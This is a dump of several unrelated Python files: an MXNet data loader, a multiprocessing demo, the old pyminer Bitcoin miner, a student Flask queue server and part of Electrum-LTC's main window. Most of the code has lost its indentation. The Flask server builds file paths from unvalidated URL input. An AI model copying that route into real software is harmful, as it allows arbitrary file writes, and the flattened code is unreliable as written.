self._data = [mx.nd.array(np.random.uniform(size=shape)) for v_group, shape in self._provide_data]
self._label = [mx.nd.array(np.random.randint(self._data_format.num_classes, size=self.batch_size))]
for v in self._data_format.extra_label_vars:
self._label.append(mx.nd.random_uniform(shape=self._batch_size))
return mx.io.DataBatch(self._data, self._label, provide_data=self.provide_data, provide_label=self.provide_label, pad=0)
generator_output = None
while True:
self.enqueuer.add()
if not self.enqueuer.queue.empty():
generator_output = self.enqueuer.queue.get()
break
else:
if not self.enqueuer.is_running():
break
time.sleep(self._wait_time)
if generator_output is None:
self.enqueuer.stop()
raise StopIteration
X_batch, y_batch, ext_batch, Z_batch = generator_output
self._data = [mx.nd.array(X_batch[v_group]) for v_group in self._data_format.train_groups]
if self._one_hot_label:
self._label = [mx.nd.array(y_batch)]
else:
self._label = [mx.nd.array(np.argmax(y_batch, axis=1))] # cannot use one-hot labelling?
for i, v in enumerate(self._data_format.extra_label_vars):
self._label.append(mx.nd.array(ext_batch[:, i]))
if Z_batch is not None:
self._truths.append(y_batch)
self._observers.append(Z_batch)
if self._ibatch % (self.steps_per_epoch // 50) == 0:
logging.info('Batch %d/%d' % (self._ibatch, self.steps_per_epoch))
# logging.info('Batch %d/%d' % (self._ibatch, self.steps_per_epoch))
# if self._ibatch % 100 == 0 or self._ibatch > self.steps_per_epoch - 100:
# print(self._ibatch, ': ', np.unique(self._label[0].asnumpy(), return_counts=True))
return mx.io.DataBatch(self._data, self._label, provide_data=self.provide_data, provide_label=self.provide_label, pad=0)
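# A hedged sketch of wiring DataFormat and DataLoader together. The HDF5 file name and
# the variable/group names below are hypothetical; the command-line option names match
# add_data_args() above. This only runs when data.py is executed directly.
if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser()
    add_data_args(parser)
    args = parser.parse_args(['--dataloader-nworkers', '2', '--dataloader-qsize', '64'])
    fmt = DataFormat(train_groups=['img'],
                     train_vars={'img': ['img_pt']},  # hypothetical dataset columns
                     label_var='label', wgtvar=None,
                     filename='train_0.h5')  # hypothetical training file
    loader = DataLoader(['train_0.h5'], fmt, batch_size=128, args=args)
    for batch in loader:
        print([d.shape for d in batch.data])
        break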
|
test.py
|
"""
Custom process class
"""
from multiprocessing import Process
# Use an object-oriented approach: create your own Process subclass
class MyProcess(Process):
def __init__(self, value, group=None, target=None, name=None, args=(), kwargs={}):
self.value = value
super().__init__(group, target, name, args, kwargs)
# Entry point for the work executed in the child process
def run(self):
print("overridden run is running")
def function():
print("child process is running")
my_process = MyProcess(value=3, target=function) # This target never runs: start() calls run(), and only the default run() would invoke target
# Start the process; execution in the child begins at the run() entry point
my_process.start()
my_process.join()
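# A small follow-up sketch: if the overridden run() should also execute the target
# passed to the constructor, it can delegate back to Process.run(), which is the
# method that actually calls target(*args, **kwargs).
class MyProcessWithTarget(MyProcess):
    def run(self):
        print("overridden run is running")
        super().run()  # the default run() invokes the target
if __name__ == "__main__":
    p = MyProcessWithTarget(value=3, target=function)
    p.start()
    p.join()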
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6688
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
server.py
|
# Krishna Chaitanya Naragam
# 1001836274
from tkinter import *
from datetime import datetime
import threading
from flask import Flask
import os, signal
from flask import request
import time
# declarations
root = None
information_panel = None
# serve Queue A
def serve_A(i):
i = float(i)
output = "\n=========================\n"
output += "Meter: {}\n".format(i)
output += "Millimeter: {}\n".format(i*1000)
output += "Centimeter: {}\n".format(i*100)
output += "Kilometer: {}\n".format(i*0.001)
output += "Astronomical Unit: {}\n".format(i*(6.68459e-12))
output += "=========================\n"
return output
# serve Queue B
def serve_B(i):
i = float(i)
output = "\n=========================\n"
output += "Meter: {}\n".format(i)
output += "Parsec: {}\n".format(i*(3.24078e-17))
output += "Light Year: {}\n".format(i*(1.057e-16))
output += "Inch: {}\n".format(i*39.3701)
output += "Foot: {}\n".format(i*3.28084)
output += "Yard: {}\n".format(i*(1.0936133333333))
output += "=========================\n"
return output
# serve Queue C
def serve_C(i):
i = float(i)
output = "=========================\n"
output += "Meter: {}\n".format(i)
output += "Mile: {}\n".format(i*0.000621371)
output += "Nautical Mile: {}\n".format(i*0.000539957)
output += "American football field: {}\n".format(i/109.7)
output += "Hand: {}\n".format(i*9.84252)
output += "Horse: {}\n".format(i/2.4)
output += "=========================\n"
return output
# Quit functionality for GUI
def quit():
global app
global root
app.do_teardown_appcontext()
root.destroy()
os.kill(os.getpid(), signal.SIGINT)
# append information to panel on the UI
def append_info_panel(info):
global information_panel
information_panel['state'] = NORMAL
information_panel.insert(END, str(datetime.now())+ ": " + str(info)+"\n")
information_panel.see(END)
information_panel['state'] = DISABLED
# run GUI
def run_GUI():
# GUI loop
global information_panel
global root
root = Tk()
root.title('Server')
server_status = Label(root, text="Server: Online")
server_status.pack()
information_panel = Text()
information_panel.pack()
information_panel['state'] = DISABLED
quit_button = Button(root, command=quit, text="Quit")
quit_button.pack()
root.mainloop()
app = Flask(__name__)
# home page
@app.route('/')
def home():
return 'Server up!'
# get entire queue and delete the file
@app.route('/getQueue/<user>/<q>')
def getQueue(user,q):
append_info_panel("User connected {}".format(user))
if q in ['A', 'B', 'C']:
out = ''
try:
f= open('{}.queue'.format(q))
out = f.read()
f.close()
os.remove('{}.queue'.format(q))
except Exception as e:
out = "Queue {} is empty!".format(q)
append_info_panel("Getting Queue {}\n{}".format(q, out))
return out
append_info_panel("User {} Disconnected!".format(user))
return "Queue Not Found"
# put item into the queue
@app.route('/putInQueue/<user>/<q>/<metric>')
def putInQueue(user,q,metric):
append_info_panel("User connected {}".format(user))
append_info_panel("user {} inserterd to queue: {}, metric: {}".format(user, q, metric))
f = open('{}.queue'.format(q),'a+')
if q == 'A':
metric = serve_A(metric)
if q == 'B':
metric = serve_B(metric)
if q == 'C':
metric = serve_C(metric)
f.write(metric)
f.close()
append_info_panel("Converted values are,\n{}".format(metric))
append_info_panel("User {} Disconnected!".format(user))
return "inserted to queue: {}".format(q)
if __name__ == '__main__':
port = 5000
t = threading.Thread(target=run_GUI)
t.daemon = True
t.start()
time.sleep(2)
append_info_panel("Server running on port {}".format(port))
app.run(port=port)
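# --- Minimal client sketch (not part of the original assignment) -----------
# The routes above define a tiny HTTP protocol: insert a value with
# /putInQueue/<user>/<q>/<metric>, then read-and-clear the queue with
# /getQueue/<user>/<q>. A standard-library client, assuming the server is
# running on localhost:5000 as configured in __main__:
from urllib.request import urlopen

BASE = "http://127.0.0.1:5000"

def put_in_queue(user: str, queue: str, metric: float) -> str:
    with urlopen(f"{BASE}/putInQueue/{user}/{queue}/{metric}") as resp:
        return resp.read().decode()

def get_queue(user: str, queue: str) -> str:
    with urlopen(f"{BASE}/getQueue/{user}/{queue}") as resp:
        return resp.read().decode()

if __name__ == "__main__":
    print(put_in_queue("alice", "A", 12.5))   # converts 12.5 m via queue A
    print(get_queue("alice", "A"))            # prints and clears the queue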
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget)
import electrum_ltc as electrum
from electrum_ltc import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum_ltc.bitcoin import COIN, is_address
from electrum_ltc.plugin import run_hook, BasePlugin
from electrum_ltc.i18n import _
from electrum_ltc.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException)
from electrum_ltc.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum_ltc.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum_ltc.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum_ltc.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx)
from electrum_ltc.version import ELECTRUM_VERSION
from electrum_ltc.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError
from electrum_ltc.exchange_rate import FxThread
from electrum_ltc.simple_config import SimpleConfig
from electrum_ltc.logging import Logger
from electrum_ltc.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum_ltc.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
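# A hypothetical usage sketch (the method name is invented for illustration and
# is not part of Electrum): the decorator passes the collected password in as a
# keyword argument, so a wrapped method simply declares it and never prompts
# on its own:
#
#     @protected
#     def do_something_sensitive(self, arg, password):
#         # 'password' is None when the wallet has no keystore encryption
#         ...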
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-ltc.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum-LTC - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once the GUI has been initialized, check whether anything needs to be announced, since the callback may have fired before the GUI existed
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-LTC Testnet" if constants.net.TESTNET else "Electrum-LTC"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
